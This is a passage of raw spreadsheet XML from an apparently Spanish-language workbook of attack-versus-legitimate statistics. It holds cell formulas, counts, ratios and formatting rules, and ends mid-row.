      <c r="B9" s="523">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!H79</f>
        <v>13523</v>
      </c>
      <c r="C9" s="524">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!N79</f>
        <v>4968</v>
      </c>
      <c r="D9" s="524">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!T79</f>
        <v>18491</v>
      </c>
      <c r="E9" s="587">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!Z79</f>
        <v>383176</v>
      </c>
      <c r="F9" s="587">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AF79</f>
        <v>192858</v>
      </c>
      <c r="G9" s="587">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AL79</f>
        <v>572909</v>
      </c>
      <c r="H9" s="524">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AR79</f>
        <v>2</v>
      </c>
      <c r="I9" s="285">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AX79</f>
        <v>8207</v>
      </c>
      <c r="J9" s="306">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BD79</f>
        <v>26696</v>
      </c>
      <c r="K9" s="461">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BJ79</f>
        <v>655807</v>
      </c>
      <c r="L9" s="309">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BP79</f>
        <v>1977311</v>
      </c>
      <c r="M9" s="461">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BW79</f>
        <v>19923</v>
      </c>
      <c r="N9" s="309">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!CC79</f>
        <v>2508032</v>
      </c>
      <c r="O9" s="554"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A10" s="562" t="s">
        <v>4451</v>
      </c>
      <c r="B10" s="481">
        <f>'Tabla 3 (Legítimo)'!B$20</f>
        <v>3391362</v>
      </c>
      <c r="C10" s="482">
        <f>'Tabla 3 (Legítimo)'!C$20</f>
        <v>4719941</v>
      </c>
      <c r="D10" s="482">
        <f>'Tabla 3 (Legítimo)'!D$20</f>
        <v>7276338</v>
      </c>
      <c r="E10" s="482">
        <f>'Tabla 3 (Legítimo)'!E$20</f>
        <v>6879262</v>
      </c>
      <c r="F10" s="482">
        <f>'Tabla 3 (Legítimo)'!F$20</f>
        <v>6115454</v>
      </c>
      <c r="G10" s="482">
        <f>'Tabla 3 (Legítimo)'!G$20</f>
        <v>9478500</v>
      </c>
      <c r="H10" s="482">
        <f>'Tabla 3 (Legítimo)'!H$20</f>
        <v>6398</v>
      </c>
      <c r="I10" s="43">
        <f>'Tabla 3 (Legítimo)'!I$20</f>
        <v>7470907</v>
      </c>
      <c r="J10" s="305">
        <f>'Tabla 3 (Legítimo)'!J$20</f>
        <v>10855081</v>
      </c>
      <c r="K10" s="521">
        <f>'Tabla 3 (Legítimo)'!K$20</f>
        <v>4403121</v>
      </c>
      <c r="L10" s="522">
        <f>'Tabla 3 (Legítimo)'!L$20</f>
        <v>18609931</v>
      </c>
      <c r="M10" s="521">
        <f>'Tabla 3 (Legítimo)'!M$20</f>
        <v>21995</v>
      </c>
      <c r="N10" s="522">
        <f>'Tabla 3 (Legítimo)'!N$20</f>
        <v>27763</v>
      </c>
      <c r="O10" s="723" t="s">
        <v>668</v>
      </c>
      <c r="P10" s="724"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="15" customHeight="1">
      <c r="A11" s="563" t="s">
        <v>4452</v>
      </c>
      <c r="B11" s="440">
        <f>'Tabla 3 (Legítimo)'!B21</f>
        <v>75302844</v>
      </c>
      <c r="C11" s="284">
        <f>'Tabla 3 (Legítimo)'!C21</f>
        <v>73974265</v>
      </c>
      <c r="D11" s="284">
        <f>'Tabla 3 (Legítimo)'!D21</f>
        <v>71417868</v>
      </c>
      <c r="E11" s="284">
        <f>'Tabla 3 (Legítimo)'!E21</f>
        <v>71814944</v>
      </c>
      <c r="F11" s="284">
        <f>'Tabla 3 (Legítimo)'!F21</f>
        <v>72578752</v>
      </c>
      <c r="G11" s="284">
        <f>'Tabla 3 (Legítimo)'!G21</f>
        <v>69215706</v>
      </c>
      <c r="H11" s="284">
        <f>'Tabla 3 (Legítimo)'!H21</f>
        <v>78687808</v>
      </c>
      <c r="I11" s="284">
        <f>'Tabla 3 (Legítimo)'!I21</f>
        <v>71223299</v>
      </c>
      <c r="J11" s="304">
        <f>'Tabla 3 (Legítimo)'!J21</f>
        <v>67839125</v>
      </c>
      <c r="K11" s="434">
        <f>'Tabla 3 (Legítimo)'!K21</f>
        <v>74291085</v>
      </c>
      <c r="L11" s="435">
        <f>'Tabla 3 (Legítimo)'!L21</f>
        <v>60084275</v>
      </c>
      <c r="M11" s="434">
        <f>'Tabla 3 (Legítimo)'!M21</f>
        <v>78672211</v>
      </c>
      <c r="N11" s="435">
        <f>'Tabla 3 (Legítimo)'!N21</f>
        <v>78666443</v>
      </c>
      <c r="O11" s="723"/>
      <c r="P11" s="724"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="15" customHeight="1">
      <c r="A12" s="446" t="s">
        <v>4149</v>
      </c>
      <c r="B12" s="440">
        <f>'Tabla 3 (Legítimo)'!B16</f>
        <v>9778069</v>
      </c>
      <c r="C12" s="284">
        <f>'Tabla 3 (Legítimo)'!C16</f>
        <v>5500009</v>
      </c>
      <c r="D12" s="284">
        <f>'Tabla 3 (Legítimo)'!D16</f>
        <v>15278078</v>
      </c>
      <c r="E12" s="586">
        <f>'Tabla 3 (Legítimo)'!E16</f>
        <v>15309135</v>
      </c>
      <c r="F12" s="586">
        <f>'Tabla 3 (Legítimo)'!F16</f>
        <v>14539188</v>
      </c>
      <c r="G12" s="586">
        <f>'Tabla 3 (Legítimo)'!G16</f>
        <v>29848323</v>
      </c>
      <c r="H12" s="284">
        <f>'Tabla 3 (Legítimo)'!H16</f>
        <v>6990</v>
      </c>
      <c r="I12" s="284">
        <f>'Tabla 3 (Legítimo)'!I16</f>
        <v>8738223</v>
      </c>
      <c r="J12" s="304">
        <f>'Tabla 3 (Legítimo)'!J16</f>
        <v>24009324</v>
      </c>
      <c r="K12" s="460">
        <f>'Tabla 3 (Legítimo)'!K16</f>
        <v>4424853</v>
      </c>
      <c r="L12" s="308">
        <f>'Tabla 3 (Legítimo)'!L16</f>
        <v>25932651</v>
      </c>
      <c r="M12" s="460">
        <f>'Tabla 3 (Legítimo)'!M16</f>
        <v>24194</v>
      </c>
      <c r="N12" s="308">
        <f>'Tabla 3 (Legítimo)'!N16</f>
        <v>54938</v>
      </c>
      <c r="O12" s="555"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A13" s="565" t="s">
        <v>4456</v>
      </c>
      <c r="B13" s="441">
        <f>'Tabla 3 (Legítimo)'!B17</f>
        <v>8620288</v>
      </c>
      <c r="C13" s="285">
        <f>'Tabla 3 (Legítimo)'!C17</f>
        <v>5136879</v>
      </c>
      <c r="D13" s="285">
        <f>'Tabla 3 (Legítimo)'!D17</f>
        <v>13757167</v>
      </c>
      <c r="E13" s="592">
        <f>'Tabla 3 (Legítimo)'!E17</f>
        <v>13128811</v>
      </c>
      <c r="F13" s="592">
        <f>'Tabla 3 (Legítimo)'!F17</f>
        <v>13066562</v>
      </c>
      <c r="G13" s="592">
        <f>'Tabla 3 (Legítimo)'!G17</f>
        <v>26195373</v>
      </c>
      <c r="H13" s="285">
        <f>'Tabla 3 (Legítimo)'!H17</f>
        <v>6420</v>
      </c>
      <c r="I13" s="285">
        <f>'Tabla 3 (Legítimo)'!I17</f>
        <v>7505544</v>
      </c>
      <c r="J13" s="306">
        <f>'Tabla 3 (Legítimo)'!J17</f>
        <v>21256304</v>
      </c>
      <c r="K13" s="461">
        <f>'Tabla 3 (Legítimo)'!K17</f>
        <v>4403661</v>
      </c>
      <c r="L13" s="309">
        <f>'Tabla 3 (Legítimo)'!L17</f>
        <v>25655131</v>
      </c>
      <c r="M13" s="461">
        <f>'Tabla 3 (Legítimo)'!M17</f>
        <v>22009</v>
      </c>
      <c r="N13" s="309">
        <f>'Tabla 3 (Legítimo)'!N17</f>
        <v>49743</v>
      </c>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A14" s="480" t="s">
        <v>638</v>
      </c>
      <c r="B14" s="534">
        <f>B6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="C14" s="535">
        <f>C6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.46363636363636362</v>
      </c>
      <c r="D14" s="535">
        <f>D6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.8</v>
      </c>
      <c r="E14" s="588">
        <f>E6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="F14" s="588">
        <f>F6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>1</v>
      </c>
      <c r="G14" s="588">
        <f>G6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>1</v>
      </c>
      <c r="H14" s="535">
        <f>H6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I14" s="535">
        <f>I6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="J14" s="538">
        <f>J6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.88181818181818183</v>
      </c>
      <c r="K14" s="539">
        <f>K6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.5757575757575758</v>
      </c>
      <c r="L14" s="540">
        <f>L6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.94848484848484849</v>
      </c>
      <c r="M14" s="539">
        <f>M6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.3</v>
      </c>
      <c r="N14" s="540">
        <f>N6/'T2 (At) S&lt;=3, FG&gt;=2'!$D$79</f>
        <v>0.66363636363636369</v>
      </c>
      <c r="O14" s="262"/>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A15" s="564" t="s">
        <v>639</v>
      </c>
      <c r="B15" s="593">
        <f t="shared" ref="B15:N15" si="0">B10/$B$4</f>
        <v>4.3095447204842499E-2</v>
      </c>
      <c r="C15" s="589">
        <f t="shared" si="0"/>
        <v>5.9978253036824594E-2</v>
      </c>
      <c r="D15" s="589">
        <f t="shared" si="0"/>
        <v>9.2463452773130464E-2</v>
      </c>
      <c r="E15" s="591">
        <f t="shared" si="0"/>
        <v>8.7417642920242442E-2</v>
      </c>
      <c r="F15" s="591">
        <f t="shared" si="0"/>
        <v>7.7711617040776795E-2</v>
      </c>
      <c r="G15" s="591">
        <f t="shared" si="0"/>
        <v>0.12044724105863651</v>
      </c>
      <c r="H15" s="589">
        <f t="shared" si="0"/>
        <v>8.1302046557277675E-5</v>
      </c>
      <c r="I15" s="589">
        <f t="shared" si="0"/>
        <v>9.4935921966097472E-2</v>
      </c>
      <c r="J15" s="590">
        <f t="shared" si="0"/>
        <v>0.13794002826586751</v>
      </c>
      <c r="K15" s="541">
        <f t="shared" si="0"/>
        <v>5.5952289549754147E-2</v>
      </c>
      <c r="L15" s="542">
        <f t="shared" si="0"/>
        <v>0.23648413200839716</v>
      </c>
      <c r="M15" s="541">
        <f t="shared" si="0"/>
        <v>2.794996114453458E-4</v>
      </c>
      <c r="N15" s="542">
        <f t="shared" si="0"/>
        <v>3.5279598602214754E-4</v>
      </c>
      <c r="O15" s="262"/>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19" ht="15" customHeight="1" thickTop="1" thickBot="1">
      <c r="A16" s="447" t="s">
        <v>640</v>
      </c>
      <c r="B16" s="536">
        <f t="shared" ref="B16:N16" si="1">SQRT(B14*(1-B15))</f>
        <v>0.83422454042723038</v>
      </c>
      <c r="C16" s="537">
        <f t="shared" si="1"/>
        <v>0.66017290500376391</v>
      </c>
      <c r="D16" s="537">
        <f t="shared" si="1"/>
        <v>0.85207349318089676</v>
      </c>
      <c r="E16" s="537">
        <f t="shared" si="1"/>
        <v>0.928873047085919</v>
      </c>
      <c r="F16" s="537">
        <f t="shared" si="1"/>
        <v>0.9603584658653368</v>
      </c>
      <c r="G16" s="537">
        <f t="shared" si="1"/>
        <v>0.93784474138386231</v>
      </c>
      <c r="H16" s="537">
        <f t="shared" si="1"/>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I16" s="537">
        <f t="shared" si="1"/>
        <v>0.67879296863756988</v>
      </c>
      <c r="J16" s="543">
        <f t="shared" si="1"/>
        <v>0.87188310964992655</v>
      </c>
      <c r="K16" s="544">
        <f t="shared" si="1"/>
        <v>0.73725343076063299</v>
      </c>
      <c r="L16" s="545">
        <f t="shared" si="1"/>
        <v>0.85098956066910303</v>
      </c>
      <c r="M16" s="544">
        <f t="shared" si="1"/>
        <v>0.54764600803490415</v>
      </c>
      <c r="N16" s="545">
        <f t="shared" si="1"/>
        <v>0.81449508002878346</v>
      </c>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:17" ht="15" customHeight="1" thickTop="1">
      <c r="A17" s="525" t="s">
        <v>4915</v>
      </c>
      <c r="B17" s="594">
        <f t="shared" ref="B17:N17" si="2">B12/B8</f>
        <v>262.43508950857512</v>
      </c>
      <c r="C17" s="595">
        <f t="shared" si="2"/>
        <v>417.33128461947035</v>
      </c>
      <c r="D17" s="595">
        <f t="shared" si="2"/>
        <v>302.90808517387683</v>
      </c>
      <c r="E17" s="595">
        <f t="shared" si="2"/>
        <v>8.5082939712191106</v>
      </c>
      <c r="F17" s="595">
        <f t="shared" si="2"/>
        <v>39.528964604103741</v>
      </c>
      <c r="G17" s="595">
        <f t="shared" si="2"/>
        <v>13.835353748386364</v>
      </c>
      <c r="H17" s="595">
        <f t="shared" si="2"/>
        <v>436.875</v>
      </c>
      <c r="I17" s="595">
        <f t="shared" si="2"/>
        <v>339.95576563958917</v>
      </c>
      <c r="J17" s="596">
        <f t="shared" si="2"/>
        <v>315.38927567453959</v>
      </c>
      <c r="K17" s="526">
        <f t="shared" si="2"/>
        <v>6.7354794222364971</v>
      </c>
      <c r="L17" s="527">
        <f t="shared" si="2"/>
        <v>13.035439399697195</v>
      </c>
      <c r="M17" s="526">
        <f t="shared" si="2"/>
        <v>1.2109109109109109</v>
      </c>
      <c r="N17" s="527">
        <f t="shared" si="2"/>
        <v>1.3690045001369304E-2</v>
      </c>
    </row>
    <row r="18" spans="1:17" ht="15" customHeight="1" thickBot="1">
      <c r="A18" s="566" t="s">
        <v>4916</v>
      </c>
      <c r="B18" s="528">
        <f>B13/B9</f>
        <v>637.45381941876803</v>
      </c>
      <c r="C18" s="528">
        <f t="shared" ref="C18:N18" si="3">C13/C9</f>
        <v>1033.9933574879226</v>
      </c>
      <c r="D18" s="528">
        <f t="shared" si="3"/>
        <v>743.99259099021151</v>
      </c>
      <c r="E18" s="528">
        <f t="shared" si="3"/>
        <v>34.263134956260309</v>
      </c>
      <c r="F18" s="528">
        <f t="shared" si="3"/>
        <v>67.752242582625556</v>
      </c>
      <c r="G18" s="528">
        <f t="shared" si="3"/>
        <v>45.723444735551368</v>
      </c>
      <c r="H18" s="528">
        <f t="shared" si="3"/>
        <v>3210</v>
      </c>
      <c r="I18" s="528">
        <f t="shared" si="3"/>
        <v>914.52954794687457</v>
      </c>
      <c r="J18" s="528">
        <f t="shared" si="3"/>
        <v>796.23554090500454</v>
      </c>
      <c r="K18" s="528">
        <f t="shared" si="3"/>
        <v>6.7148734307502052</v>
      </c>
      <c r="L18" s="528">
        <f t="shared" si="3"/>
        <v>12.97475763802457</v>
      </c>
      <c r="M18" s="528">
        <f t="shared" si="3"/>
        <v>1.104703106961803</v>
      </c>
      <c r="N18" s="528">
        <f t="shared" si="3"/>
        <v>1.9833478998673063E-2</v>
      </c>
    </row>
    <row r="19" spans="1:17" ht="26.45" customHeight="1" thickTop="1">
      <c r="A19" s="24"/>
      <c r="B19" s="573"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="23" t="s">
        <v>669</v>
      </c>
      <c r="F19" s="24"/>
      <c r="G19" s="24"/>
      <c r="H19" s="24"/>
      <c r="I19" s="24"/>
      <c r="J19" s="574"/>
      <c r="K19" s="722"/>
      <c r="L19" s="722"/>
      <c r="M19" s="722"/>
      <c r="N19" s="722"/>
      <c r="O19" s="722"/>
      <c r="P19" s="722"/>
      <c r="Q19" s="722"/>
    </row>
    <row r="20" spans="1:17">
      <c r="A20" s="24"/>
      <c r="B20" s="24"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="24"/>
      <c r="I20" s="24"/>
      <c r="J20" s="575" t="s">
        <v>657</v>
      </c>
    </row>
    <row r="21" spans="1:17" ht="23.25" customHeight="1">
      <c r="A21" s="716" t="s">
        <v>670</v>
      </c>
      <c r="B21" s="716"/>
      <c r="C21" s="716"/>
      <c r="D21" s="716"/>
      <c r="E21" s="23" t="s">
        <v>648</v>
      </c>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="23" t="s">
        <v>649</v>
      </c>
      <c r="I21" s="24"/>
      <c r="J21" s="25" t="s">
        <v>654</v>
      </c>
      <c r="K21" s="23" t="s">
        <v>642</v>
      </c>
      <c r="L21" s="23"/>
      <c r="M21" s="23"/>
    </row>
    <row r="22" spans="1:17" ht="25.5" customHeight="1">
      <c r="A22" s="23" t="s">
        <v>671</v>
      </c>
      <c r="B22" s="24"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="23" t="s">
        <v>659</v>
      </c>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="23" t="s">
        <v>660</v>
      </c>
      <c r="I22" s="24"/>
      <c r="J22" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K22" s="23" t="s">
        <v>647</v>
      </c>
      <c r="L22" s="23"/>
      <c r="M22" s="23"/>
    </row>
    <row r="23" spans="1:17">
      <c r="A23" s="715" t="s">
        <v>672</v>
      </c>
      <c r="B23" s="715"/>
      <c r="C23" s="715"/>
      <c r="D23" s="715"/>
      <c r="E23" s="23" t="s">
        <v>650</v>
      </c>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="23" t="s">
        <v>651</v>
      </c>
      <c r="I23" s="24"/>
      <c r="J23" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K23" s="23" t="s">
        <v>643</v>
      </c>
      <c r="L23" s="23"/>
      <c r="M23" s="23"/>
    </row>
    <row r="24" spans="1:17">
      <c r="A24" s="24"/>
      <c r="B24" s="24"/>
      <c r="C24" s="24"/>
      <c r="D24" s="24"/>
      <c r="E24" s="24"/>
      <c r="F24" s="24"/>
      <c r="G24" s="24"/>
      <c r="H24" s="24"/>
      <c r="I24" s="24"/>
      <c r="J24" s="25"/>
      <c r="K24" s="24"/>
      <c r="L24" s="24"/>
      <c r="M24" s="24"/>
    </row>
    <row r="25" spans="1:17">
      <c r="A25" s="23" t="s">
        <v>661</v>
      </c>
      <c r="B25" s="24"/>
      <c r="C25" s="24"/>
      <c r="D25" s="24"/>
      <c r="E25" s="24"/>
      <c r="F25" s="24"/>
      <c r="G25" s="24"/>
      <c r="H25" s="24"/>
      <c r="I25" s="24"/>
      <c r="J25" s="25"/>
      <c r="K25" s="24"/>
      <c r="L25" s="24"/>
      <c r="M25" s="24"/>
    </row>
    <row r="26" spans="1:17">
      <c r="A26" s="23" t="s">
        <v>662</v>
      </c>
      <c r="B26" s="24"/>
      <c r="C26" s="24"/>
      <c r="D26" s="24"/>
      <c r="E26" s="23" t="s">
        <v>652</v>
      </c>
      <c r="F26" s="24"/>
      <c r="G26" s="24"/>
      <c r="H26" s="23" t="s">
        <v>653</v>
      </c>
      <c r="I26" s="24"/>
      <c r="J26" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K26" s="23" t="s">
        <v>644</v>
      </c>
      <c r="L26" s="23"/>
      <c r="M26" s="23"/>
    </row>
    <row r="27" spans="1:17">
      <c r="A27" s="24" t="s">
        <v>645</v>
      </c>
      <c r="B27" s="24"/>
      <c r="C27" s="24"/>
      <c r="D27" s="24"/>
      <c r="E27" s="23" t="s">
        <v>640</v>
      </c>
      <c r="F27" s="24"/>
      <c r="G27" s="24"/>
      <c r="H27" s="23" t="s">
        <v>666</v>
      </c>
      <c r="I27" s="24"/>
      <c r="J27" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K27" s="23" t="s">
        <v>646</v>
      </c>
      <c r="L27" s="23"/>
      <c r="M27" s="23"/>
    </row>
    <row r="29" spans="1:17">
      <c r="H29" s="23"/>
    </row>
    <row r="30" spans="1:17">
      <c r="A30" s="23" t="s">
        <v>663</v>
      </c>
      <c r="E30" s="262" t="s">
        <v>664</v>
      </c>
      <c r="H30" s="23" t="s">
        <v>665</v>
      </c>
      <c r="J30" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K30" s="262" t="s">
        <v>2321</v>
      </c>
      <c r="L30" s="262"/>
      <c r="M30" s="262"/>
    </row>
    <row r="32" spans="1:17">
      <c r="A32" s="262" t="s">
        <v>4917</v>
      </c>
      <c r="E32" s="262" t="s">
        <v>4918</v>
      </c>
      <c r="H32" s="23" t="s">
        <v>2248</v>
      </c>
      <c r="J32" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K32" s="572" t="s">
        <v>2247</v>
      </c>
      <c r="L32" s="572"/>
      <c r="M32" s="572"/>
    </row>
    <row r="33" spans="1:3" ht="29.25" customHeight="1"/>
    <row r="34" spans="1:3">
      <c r="A34" s="576" t="s">
        <v>673</v>
      </c>
      <c r="B34" s="577">
        <v>1</v>
      </c>
      <c r="C34" s="262" t="s">
        <v>2322</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" s="578"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="B1:J1"/>
    <mergeCell ref="K1:L1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="B3:N3"/>
    <mergeCell ref="B4:N4"/>
    <mergeCell ref="K19:Q19"/>
    <mergeCell ref="A21:D21"/>
    <mergeCell ref="A23:D23"/>
    <mergeCell ref="O5:P5"/>
    <mergeCell ref="O6:P7"/>
    <mergeCell ref="O10:P11"/>
    <mergeCell ref="B5:N5"/>
  </mergeCells>
  <conditionalFormatting sqref="E6:G6">
    <cfRule type="expression" dxfId="450" priority="25">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E7:G7">
    <cfRule type="expression" dxfId="449" priority="20">
      <formula>IF(E7&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E8:G10">
    <cfRule type="expression" dxfId="448" priority="6">
      <formula>IF(E8&lt;B8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E11:G11">
    <cfRule type="expression" dxfId="447" priority="17">
      <formula>IF(E11&gt;B11,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E12:G15">
    <cfRule type="expression" dxfId="446" priority="1">
      <formula>IF(E12&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>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9">
    <tabColor rgb="FFFF9BB0"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:V92"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <pane xSplit="1" ySplit="3" topLeftCell="D4" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="K55" sqref="K55:N55"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="35" style="26" customWidth="1"/>
    <col min="2" max="2" width="20.140625" style="214" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="214" customWidth="1"/>
    <col min="4" max="4" width="20.42578125" style="214" customWidth="1"/>
    <col min="5" max="5" width="19.42578125" style="214" customWidth="1"/>
    <col min="6" max="6" width="15.5703125" style="214" customWidth="1"/>
    <col min="7" max="7" width="11" style="214" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="214" customWidth="1"/>
    <col min="9" max="9" width="16.7109375" style="214" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15.85546875" style="214" customWidth="1"/>
    <col min="12" max="12" width="21.42578125" style="214" customWidth="1"/>
    <col min="13" max="13" width="15.140625" style="214" customWidth="1"/>
    <col min="14" max="14" width="29.28515625" style="214" customWidth="1"/>
    <col min="15" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19" ht="19.5">
      <c r="A1" s="569" t="s">
        <v>2352</v>
      </c>
      <c r="B1" s="570"/>
      <c r="C1" s="570"/>
      <c r="D1" s="570"/>
    </row>
    <row r="2" spans="1:19" ht="12.75" customHeight="1">
      <c r="A2" s="571"/>
      <c r="B2" s="713" t="s">
        <v>2462</v>
      </c>
      <c r="C2" s="714"/>
      <c r="D2" s="714"/>
      <c r="E2" s="714"/>
      <c r="F2" s="714"/>
      <c r="G2" s="714"/>
      <c r="H2" s="714"/>
      <c r="I2" s="714"/>
      <c r="J2" s="714"/>
      <c r="K2" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L2" s="702"/>
      <c r="M2" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N2" s="704"/>
    </row>
    <row r="3" spans="1:19" ht="28.5" customHeight="1" thickBot="1">
      <c r="A3" s="21" t="s">
        <v>641</v>
      </c>
      <c r="B3" s="21" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D3" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E3" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F3" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G3" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H3" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I3" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J3" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K3" s="416" t="s">
        <v>2345</v>
      </c>
      <c r="L3" s="417" t="s">
        <v>2463</v>
      </c>
      <c r="M3" s="419" t="s">
        <v>2345</v>
      </c>
      <c r="N3" s="420" t="s">
        <v>2472</v>
      </c>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="12.75" customHeight="1" thickTop="1" thickBot="1">
      <c r="A4" s="727" t="s">
        <v>4146</v>
      </c>
      <c r="B4" s="728"/>
      <c r="C4" s="728"/>
      <c r="D4" s="728"/>
      <c r="E4" s="728"/>
      <c r="F4" s="728"/>
      <c r="G4" s="728"/>
      <c r="H4" s="728"/>
      <c r="I4" s="728"/>
      <c r="J4" s="728"/>
      <c r="K4" s="728"/>
      <c r="L4" s="728"/>
      <c r="M4" s="728"/>
      <c r="N4" s="729"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19">
      <c r="A5" s="259" t="s">
        <v>640</v>
      </c>
      <c r="B5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!B16</f>
        <v>0.83422454042723038</v>
      </c>
      <c r="C5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!C16</f>
        <v>0.66017290500376391</v>
      </c>
      <c r="D5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!D16</f>
        <v>0.85207349318089676</v>
      </c>
      <c r="E5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!E16</f>
        <v>0.928873047085919</v>
      </c>
      <c r="F5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!F16</f>
        <v>0.9603584658653368</v>
      </c>
      <c r="G5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!G16</f>
        <v>0.93784474138386231</v>
      </c>
      <c r="H5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!H16</f>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I5" s="557">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!I16</f>
        <v>0.67879296863756988</v>
      </c>
      <c r="J5" s="558">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!J16</f>
        <v>0.87188310964992655</v>
      </c>
      <c r="K5" s="559">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!K16</f>
        <v>0.73725343076063299</v>
      </c>
      <c r="L5" s="560">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!L16</f>
        <v>0.85098956066910303</v>
      </c>
      <c r="M5" s="561">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!M16</f>
        <v>0.54764600803490415</v>
      </c>
      <c r="N5" s="560">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!N16</f>
